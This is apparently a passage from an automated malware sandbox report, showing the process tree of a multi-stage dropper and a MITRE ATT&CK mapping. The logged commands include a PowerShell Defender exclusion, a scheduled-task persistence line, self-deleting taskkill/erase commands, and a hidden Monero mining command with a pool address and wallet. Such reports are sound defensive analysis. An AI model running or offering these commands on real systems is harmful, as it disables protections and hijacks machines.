      C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1696
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1072
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Sun1917b8fb5f09db8.exe
      4⤵
      Loads dropped DLL
      PID:1868
    - - C:\Users\Admin\AppData\Local\Temp\7zS0160ED23\Sun1917b8fb5f09db8.exe
        
        Sun1917b8fb5f09db8.exe
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:1584
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Sun19262b9e49ad.exe
      4⤵
      Loads dropped DLL
      PID:1744
    - - C:\Users\Admin\AppData\Local\Temp\7zS0160ED23\Sun19262b9e49ad.exe
        
        Sun19262b9e49ad.exe
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        Modifies system certificate store
        Suspicious use of AdjustPrivilegeToken
        
        PID:1944
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c taskkill /f /im chrome.exe
        6⤵
        
        PID:3020
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im chrome.exe
        7⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:1216
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Sun193fda712d9f1.exe
      4⤵
      Loads dropped DLL
      PID:1032
    - - C:\Users\Admin\AppData\Local\Temp\7zS0160ED23\Sun193fda712d9f1.exe
        
        Sun193fda712d9f1.exe
        5⤵
        Executes dropped EXE
        
        PID:1828
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Sun1908b94df837b3158.exe
      4⤵
      Loads dropped DLL
      PID:1988
    - - C:\Users\Admin\AppData\Local\Temp\7zS0160ED23\Sun1908b94df837b3158.exe
        
        Sun1908b94df837b3158.exe
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        Checks SCSI registry key(s)
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: MapViewOfSection
        
        PID:472
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Sun19e4ade31b2a.exe
      4⤵
      Loads dropped DLL
      PID:736
    - - C:\Users\Admin\AppData\Local\Temp\7zS0160ED23\Sun19e4ade31b2a.exe
        
        Sun19e4ade31b2a.exe
        5⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:1640
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Sun19de8ff4b6aefeb8.exe /mixone
      4⤵
      Loads dropped DLL
      PID:608
    - - C:\Users\Admin\AppData\Local\Temp\7zS0160ED23\Sun19de8ff4b6aefeb8.exe
        
        Sun19de8ff4b6aefeb8.exe /mixone
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:1100
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\{N3pp-pWIJr-xBkQ-pzCzr}\68818825803.exe"
        6⤵
        
        PID:1620
        
        C:\Users\Admin\AppData\Local\Temp\{N3pp-pWIJr-xBkQ-pzCzr}\68818825803.exe
        
        "C:\Users\Admin\AppData\Local\Temp\{N3pp-pWIJr-xBkQ-pzCzr}\68818825803.exe"
        7⤵
        Executes dropped EXE
        Checks BIOS information in registry
        Checks whether UAC is enabled
        Suspicious use of NtSetInformationThreadHideFromDebugger
        
        PID:2668
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\{N3pp-pWIJr-xBkQ-pzCzr}\62398706830.exe" /mix
        6⤵
        
        PID:2860
        
        C:\Users\Admin\AppData\Local\Temp\{N3pp-pWIJr-xBkQ-pzCzr}\62398706830.exe
        
        "C:\Users\Admin\AppData\Local\Temp\{N3pp-pWIJr-xBkQ-pzCzr}\62398706830.exe" /mix
        7⤵
        Executes dropped EXE
        Checks processor information in registry
        
        PID:2908
        
        C:\Users\Admin\AppData\Roaming\sliders\apinesp.exe
        
        apinesp.exe
        8⤵
        Executes dropped EXE
        
        PID:2988
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c start /I "" "C:\ProgramData\Garbage Cleaner\Garbage Cleaner.exe"
        6⤵
        
        PID:1944
        
        C:\ProgramData\Garbage Cleaner\Garbage Cleaner.exe
        
        "C:\ProgramData\Garbage Cleaner\Garbage Cleaner.exe"
        7⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:2168
        
        C:\ProgramData\Garbage Cleaner\Garbage Cleaner.exe
        
        "C:\ProgramData\Garbage Cleaner\Garbage Cleaner.exe"
        8⤵
        
        PID:1820
        
        C:\ProgramData\Garbage Cleaner\Garbage Cleaner.exe
        
        "C:\ProgramData\Garbage Cleaner\Garbage Cleaner.exe"
        8⤵
        Executes dropped EXE
        
        PID:1220
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c taskkill /im "Sun19de8ff4b6aefeb8.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\7zS0160ED23\Sun19de8ff4b6aefeb8.exe" & exit
        6⤵
        
        PID:2444
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im "Sun19de8ff4b6aefeb8.exe" /f
        7⤵
        Kills process with taskkill
        
        PID:2836
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Sun191101c1aaa.exe
      4⤵
      Loads dropped DLL
      PID:1196
    - - C:\Users\Admin\AppData\Local\Temp\7zS0160ED23\Sun191101c1aaa.exe
        
        Sun191101c1aaa.exe
        5⤵
        Executes dropped EXE
        
        PID:368
      - C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
        
        "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
        6⤵
        Loads dropped DLL
        
        PID:2188
        
        C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"
        7⤵
        Executes dropped EXE
        
        PID:2276
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
        8⤵
        
        PID:928
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
        9⤵
        Creates scheduled task(s)
        
        PID:1088
        
        C:\Users\Admin\AppData\Roaming\services64.exe
        
        "C:\Users\Admin\AppData\Roaming\services64.exe"
        8⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:2192
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
        9⤵
        
        PID:2868
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
        10⤵
        Creates scheduled task(s)
        
        PID:3032
        
        C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
        9⤵
        Executes dropped EXE
        
        PID:2984
        
        C:\Windows\explorer.exe
        
        C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.add/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6O4DG/ZgkwoY7/pmBv4ks3wJ7PR9JPsLklOJLkitFc6Y" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth
        9⤵
        
        PID:2548
        
        C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe
        
        "C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe"
        7⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:2300
        
        C:\Users\Admin\AppData\Local\Temp\2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\2.exe"
        7⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:2360
        
        C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        7⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:2476
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\{XDth-MDuoB-ItIa-VFbhQ}\68538091262.exe"
        8⤵
        
        PID:2356
        
        C:\Users\Admin\AppData\Local\Temp\{XDth-MDuoB-ItIa-VFbhQ}\68538091262.exe
        
        "C:\Users\Admin\AppData\Local\Temp\{XDth-MDuoB-ItIa-VFbhQ}\68538091262.exe"
        9⤵
        Executes dropped EXE
        Checks BIOS information in registry
        Checks whether UAC is enabled
        Suspicious use of NtSetInformationThreadHideFromDebugger
        
        PID:2652
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\{XDth-MDuoB-ItIa-VFbhQ}\82489581824.exe" /mix
        8⤵
        
        PID:300
        
        C:\Users\Admin\AppData\Local\Temp\{XDth-MDuoB-ItIa-VFbhQ}\82489581824.exe
        
        "C:\Users\Admin\AppData\Local\Temp\{XDth-MDuoB-ItIa-VFbhQ}\82489581824.exe" /mix
        9⤵
        Executes dropped EXE
        Checks processor information in registry
        
        PID:2336
        
        C:\Users\Admin\AppData\Roaming\sliders\apinesp.exe
        
        apinesp.exe
        10⤵
        Executes dropped EXE
        
        PID:1572
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c taskkill /im "setup.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\setup.exe" & exit
        8⤵
        
        PID:2784
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im "setup.exe" /f
        9⤵
        Kills process with taskkill
        
        PID:1072
        
        C:\Users\Admin\AppData\Local\Temp\udptest.exe
        
        "C:\Users\Admin\AppData\Local\Temp\udptest.exe"
        7⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:2520
        
        C:\Users\Admin\AppData\Local\Temp\5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\5.exe"
        7⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:2556
        
        C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
        
        "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
        8⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:2660
        
        C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
        
        "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
        9⤵
        Executes dropped EXE
        
        PID:2116
        
        C:\Users\Admin\AppData\Local\Temp\LivelyScreenRecF18.exe
        
        "C:\Users\Admin\AppData\Local\Temp\LivelyScreenRecF18.exe"
        7⤵
        Executes dropped EXE
        
        PID:2604
        
        C:\Windows\system32\WerFault.exe
        
        C:\Windows\system32\WerFault.exe -u -p 2604 -s 792
        8⤵
        Program crash
        Suspicious behavior: GetForegroundWindowSpam
        Suspicious use of AdjustPrivilegeToken
        
        PID:2124
        
        C:\Users\Admin\AppData\Local\Temp\setup_2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup_2.exe"
        7⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:2676
        
        C:\Users\Admin\AppData\Local\Temp\is-4E1BP.tmp\setup_2.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-4E1BP.tmp\setup_2.tmp" /SL5="$101C2,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe"
        8⤵
        Executes dropped EXE
        
        PID:2916
        
        C:\Users\Admin\AppData\Local\Temp\setup_2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT
        9⤵
        Executes dropped EXE
        
        PID:3040
        
        C:\Users\Admin\AppData\Local\Temp\is-C7N5V.tmp\setup_2.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-C7N5V.tmp\setup_2.tmp" /SL5="$5019A,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT
        10⤵
        Executes dropped EXE
        Suspicious behavior: GetForegroundWindowSpam
        
        PID:1272
        
        C:\Users\Admin\AppData\Local\Temp\3002.exe
        
        "C:\Users\Admin\AppData\Local\Temp\3002.exe"
        7⤵
        Executes dropped EXE
        
        PID:2736
        
        C:\Users\Admin\AppData\Local\Temp\3002.exe
        
        "C:\Users\Admin\AppData\Local\Temp\3002.exe" -a
        8⤵
        Executes dropped EXE
        
        PID:2904
        
        C:\Users\Admin\AppData\Local\Temp\jhuuee.exe
        
        "C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"
        7⤵
        Executes dropped EXE
        
        PID:2828
        
        C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe"
        7⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:2968
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Sun19eb40faaaa9.exe
      4⤵
      Loads dropped DLL
      PID:1540
    - - C:\Users\Admin\AppData\Local\Temp\7zS0160ED23\Sun19eb40faaaa9.exe
        
        Sun19eb40faaaa9.exe
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:240
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 240 -s 956
        6⤵
        Program crash
        Suspicious behavior: GetForegroundWindowSpam
        Suspicious use of AdjustPrivilegeToken
        
        PID:2680
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Sun198361825f4.exe
      4⤵
      Loads dropped DLL
      PID:560
    - - C:\Users\Admin\AppData\Local\Temp\7zS0160ED23\Sun198361825f4.exe
        
        Sun198361825f4.exe
        5⤵
        Executes dropped EXE
        
        PID:484
      - C:\Windows\system32\WerFault.exe
        
        C:\Windows\system32\WerFault.exe -u -p 484 -s 796
        6⤵
        Program crash
        Suspicious behavior: GetForegroundWindowSpam
        Suspicious use of AdjustPrivilegeToken
        
        PID:2132
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Sun1905815e51282417.exe
      4⤵
      Loads dropped DLL
      PID:296
    - - C:\Users\Admin\AppData\Local\Temp\7zS0160ED23\Sun1905815e51282417.exe
        
        Sun1905815e51282417.exe
        5⤵
        Executes dropped EXE
        
        PID:1760
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Sun195a1614ec24e6a.exe
      4⤵
      Loads dropped DLL
      PID:1120
    - - C:\Users\Admin\AppData\Local\Temp\7zS0160ED23\Sun195a1614ec24e6a.exe
        
        Sun195a1614ec24e6a.exe
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of AdjustPrivilegeToken
        
        PID:592
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Sun1966fb31dd5a07.exe
      4⤵
      Loads dropped DLL
      PID:1512
    - - C:\Users\Admin\AppData\Local\Temp\7zS0160ED23\Sun1966fb31dd5a07.exe
        
        Sun1966fb31dd5a07.exe
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:1984
      - C:\Users\Admin\AppData\Local\Temp\is-PUKV3.tmp\Sun1966fb31dd5a07.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-PUKV3.tmp\Sun1966fb31dd5a07.tmp" /SL5="$8015E,247014,163328,C:\Users\Admin\AppData\Local\Temp\7zS0160ED23\Sun1966fb31dd5a07.exe"
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:1116
        
        C:\Users\Admin\AppData\Local\Temp\is-0TVP6.tmp\Ze2ro.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-0TVP6.tmp\Ze2ro.exe" /S /UID=burnerch2
        7⤵
        Executes dropped EXE
        
        PID:2176
        
        C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exe
        
        dw20.exe -x -s 976
        8⤵
        Suspicious behavior: GetForegroundWindowSpam
        
        PID:2136

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
1⤵
- Process spawned unexpected child process
PID:2152
- C:\Windows\SysWOW64\rundll32.exe
  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
  2⤵
  PID:2628

C:\Windows\system32\taskeng.exe
taskeng.exe {64F1C1DE-1082-4447-8707-2D6BF79684FA} S-1-5-21-3456797065-1076791440-4146276586-1000:JZCKHXIN\Admin:Interactive:[1]
1⤵
PID:1168
- C:\Users\Admin\AppData\Roaming\dajradj
  C:\Users\Admin\AppData\Roaming\dajradj
  2⤵
  - Executes dropped EXE
  - Checks SCSI registry key(s)
  - Suspicious behavior: MapViewOfSection
  PID:2740

C:\Windows\system32\taskeng.exe
taskeng.exe {395337EA-D5FC-4D6D-86F2-4226E6BEB08F} S-1-5-18:NT AUTHORITY\System:Service:
1⤵
PID:2536

C:\Windows\system32\taskeng.exe
taskeng.exe {3EE8BE1C-9A53-4DFC-9145-1E24A2B73666} S-1-5-21-3456797065-1076791440-4146276586-1000:JZCKHXIN\Admin:Interactive:[1]
1⤵
PID:908
- C:\Program Files\Mozilla Firefox\default-browser-agent.exe
  "C:\Program Files\Mozilla Firefox\default-browser-agent.exe" do-task
  2⤵
  PID:1656
- C:\Users\Admin\AppData\Roaming\dajradj
  C:\Users\Admin\AppData\Roaming\dajradj
  2⤵
  - Executes dropped EXE
  - Checks SCSI registry key(s)
  - Suspicious behavior: MapViewOfSection
  PID:2280

C:\Windows\system32\taskeng.exe
taskeng.exe {BAB10EC1-E529-4BFC-8F74-D42F62B35536} S-1-5-21-3456797065-1076791440-4146276586-1000:JZCKHXIN\Admin:Interactive:[1]
1⤵
PID:2172
- C:\Users\Admin\AppData\Roaming\dajradj
  C:\Users\Admin\AppData\Roaming\dajradj
  2⤵
  - Executes dropped EXE
  - Checks SCSI registry key(s)
  - Suspicious behavior: MapViewOfSection
  PID:2240

C:\Windows\system32\taskeng.exe
taskeng.exe {9C7349B6-0A2F-4CF5-BC4D-A86238CEF10A} S-1-5-18:NT AUTHORITY\System:Service:
1⤵
PID:2292

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

Persistence

Scheduled Task

Privilege Escalation

Scheduled Task

Defense Evasion

Install Root Certificate

T1130

Modify Registry

T1112

Virtualization/Sandbox Evasion

T1497

Web Service

T1102

Credential Access

Credentials in Files

T1081

Discovery

Peripheral Device Discovery

T1120

Query Registry

System Information Discovery